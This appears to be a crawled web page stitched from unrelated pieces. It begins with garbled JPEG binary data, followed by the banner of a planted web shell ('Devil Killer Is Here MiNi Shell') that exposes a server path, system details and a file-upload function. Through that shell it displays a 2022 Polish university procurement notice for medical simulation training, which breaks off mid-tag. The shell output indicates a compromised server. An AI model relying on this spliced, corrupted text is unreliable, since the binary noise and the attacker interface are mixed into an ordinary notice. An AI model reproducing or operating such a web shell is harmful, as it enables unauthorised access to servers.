JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220808/0029704301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Przeprowadzenie szkoleń dotyczących centrum symulacji medycznej <br/>na potrzeby Mazowieckiej Uczelni Publicznej w Płocku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Mazowiecka Uczelnia Publiczna w Płocku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611038403</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Dąbrowskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Płock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-402</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mazowiecka.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mazowiecka.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przeprowadzenie szkoleń dotyczących centrum symulacji medycznej <br/>na potrzeby Mazowieckiej Uczelni Publicznej w Płocku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a631f006-1726-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00297043</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00267679/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Przeprowadzenie szkoleń dotyczących centrum symulacji medycznej na potrzeby Mazowieckiej Uczelni Publicznej w Płocku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Symulacje medyczne kluczem do sukcesu w kształceniu położnych”, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój na lata 2014-2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mazowiecka <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mazowiecka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/mazowiecka . Instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu<br/>przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej<br/>za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl do konkretnego Wykonawcy. Zamawiający może również komunikować się z Wykonawcami za pomocą<br/>poczty elektronicznej, email: zamowienia@mazowiecka.edu.pl w sytuacjach awaryjnych np. nie działania platformy zakupowej.<br/>Jednakże zaleca się, aby komunikacja z Wykonawcami odbywała się poprzez platformazakupowa.pl, a nie za pośrednictwem email.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń za pomocą poczty elektronicznej w sytuacjach awaryjnych np. nie działania platformy zakupowej, na<br/>adres email zamowienia@mazowiecka.edu.pl. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Oświadczenia z art. 125 ust. 1 składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub elektronicznym podpisem osobistym. Zamawiający nie przewiduje sposobu komunikowania się z<br/>Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. Formaty plików<br/>wykorzystywanych przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9<br/>listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych”. Wśród formatów powszechnych, a NIE występujących w rozporządzeniu występują:<br/>.rar .gif .bmp .numbrs .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. Pliki w innych<br/>formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem<br/>przekazywać łącznie z dokumentem podpisywanym. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2<br/>zamiast SHA1. Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z<br/>wykonawcami zostały szerzej opisane w Rozdziale IX Działu I SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a)	administratorem Pani/Pana danych osobowych jest Mazowiecka Uczelnia Publiczna w Płocku, Pl. Dąbrowskiego 2, 09-402 Płock;<br/>b)	kontakt z Inspektorem ochrony danych: tel. 24 366 54 00 wew. 290, e-mail: iod@mazowiecka.edu.pl;<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), dalej „ustawa Pzp” oraz kancelaria adwokacka obsługującą Mazowiecką Uczelnię Publiczna w Płocku, a także instytucje finansujące i kontrolujące;<br/>e) Pani/Pana dane osobowe będą przechowywane do czasu zakończenia archiwizacji,tj. czasy trwałości projektu<br/>f) posiada Pani/Pan prawo dostępu do treści swoich danych, prawo ich sprostowania*, ograniczenia przetwarzania**;<br/>g) obowiązek podania przez Panią/Pana danych osobowych, bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/> h) przysługuje Pani/Panu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.MB.232.63.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> TRZECI POZIOM SYMULACJI MEDYCZNYCH W KONTEKŚCIE SYMULACJI WYSOKIEJ WIERNOŚCI<br/>(Działanie skierowane do nauczycieli i osób obsługujących Centrum Symulacji Medycznych)<br/>Opis:<br/>Etap 1(forma stacjonarna - szkolenie w siedzibie Mazowieckiej Uczeni Publicznej w Płocku) obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne<br/><br/>Etap 2: (forma zdalna - tworzenie scenariuszy symulacji): obejmuje dla każdego uczestnika:<br/>- konsultacji/warsztatów z trenerami symulacji<br/>- materiały dydaktyczne<br/><br/>Etap 3: (forma wyjazdowa - szkolenie): <br/>2- dniowe szkolenie wyjazdowe, obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne<br/>- serwis kawowy (kawa, herbata, woda, ciastka)<br/>- 2 noclegi z pełnym wyżywieniem (śniadanie/obiad/kolacja)<br/>- transport<br/>etap 1 – forma stacjonarna w siedzibie Mazowieckiej Uczelni Publicznej w Płocku<br/>etap 2 – forma zdalna<br/>etap 3 - forma wyjazdowa<br/>8 osób <br/>70 godzin lekcyjnych<br/>etap 1 – 15 godz.; etap 2 – 40 godz.; etap 3 – 15 godz.<br/>Szkolenie ma charakter praktyczny min. 75% szkolenia powinny stanowić ćwiczenia praktyczne z aktywnym udziałem każdego z uczestników. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania</p> <p class="mb-0">79632000-3 - Szkolenie pracowników</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80561000-4 - Usługi szkolenia w dziedzinie zdrowia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób prowadzących szkolenia/staże/warsztaty – w zależności od części zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> SZKOLENIE: STANDARYZOWANY PACJENT<br/>(Działanie skierowane do nauczycieli i osób obsługujących Centrum Symulacji Medycznych)<br/>Szkolenie: standaryzowany pacjent Szkolenie dla 8 uczestników, 15 h lekcyjnych <br/>PRZYKŁADOWY PROGRAM SZKOLENIA: 1. Pacjent standaryzowany, a pacjent symulowany, Zasady prowadzenia zajęć z udziałem pacjentów standaryzowanych, 2. Zasady rekrutacji pacjentów standaryzowanych, Rola i zadania pacjentów standaryzowanych, 3. Charakterystyka jednostek chorobowych, które mogą zostać wykorzystane do symulacji przez pacjentów standaryzowanych, <br/>4. Ćwiczenia praktyczne.<br/><br/>MIEJSCE/ FORMA :	forma stacjonarna w siedzibie Mazowieckiej Uczelni Publicznej w Płocku<br/>GRUPA:	8 osób <br/>LICZBA GODZIN:	15 godzin lekcyjnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania</p> <p class="mb-0">79632000-3 - Szkolenie pracowników</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80561000-4 - Usługi szkolenia w dziedzinie zdrowia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób prowadzących szkolenia/staże/warsztaty – w zależności od części zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PIERWSZY POZIOM SYMULACJI MEDYCZNYCH W KONTEKŚCIE SYMULACJI NISKIEJ WIERNOŚCI<br/>(Działanie skierowane do studentów kierunku położnictwo)<br/><br/>Opis:<br/>Etap 1 obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne<br/><br/>Etap 2 (tworzenie scenariuszy symulacji) obejmuje dla każdego uczestnika:<br/>- konsultacji/warsztatów<br/>- materiały dydaktyczne<br/><br/>Etap 3 obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne<br/><br/>DRUGI POZIOM SYMULACJI MEDYCZNYCH W KONTEKŚCIE SYMULACJI POŚREDNIEJ WIERNOŚCI<br/>(Działanie skierowane do studentów kierunku położnictwo)<br/><br/>Opis:<br/>Etap 1 obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne<br/><br/>Etap 2 (tworzenie scenariuszy symulacji) obejmuje dla każdego uczestnika: <br/>- konsultacji/warsztatów<br/>- materiały dydaktyczne<br/><br/>Etap 3 obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne<br/><br/><br/>TRZECI POZIOM SYMULACJI MEDYCZNYCH W KONTEKŚCIE SYMULACJI WYSOKIEJ WIERNOŚCI<br/>(Działanie skierowane do studentów kierunku położnictwo)<br/>Opis:<br/>Etap 1 obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne<br/><br/>Etap 2 (tworzenie scenariuszy symulacji) obejmuje dla każdego uczestnika:<br/>- konsultacji/warsztatów<br/>- materiały dydaktyczne<br/><br/>Etap 3 obejmuje dla każdego uczestnika:<br/>- udział w szkoleniu <br/>- materiały dydaktyczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania</p> <p class="mb-0">79632000-3 - Szkolenie pracowników</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80561000-4 - Usługi szkolenia w dziedzinie zdrowia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span 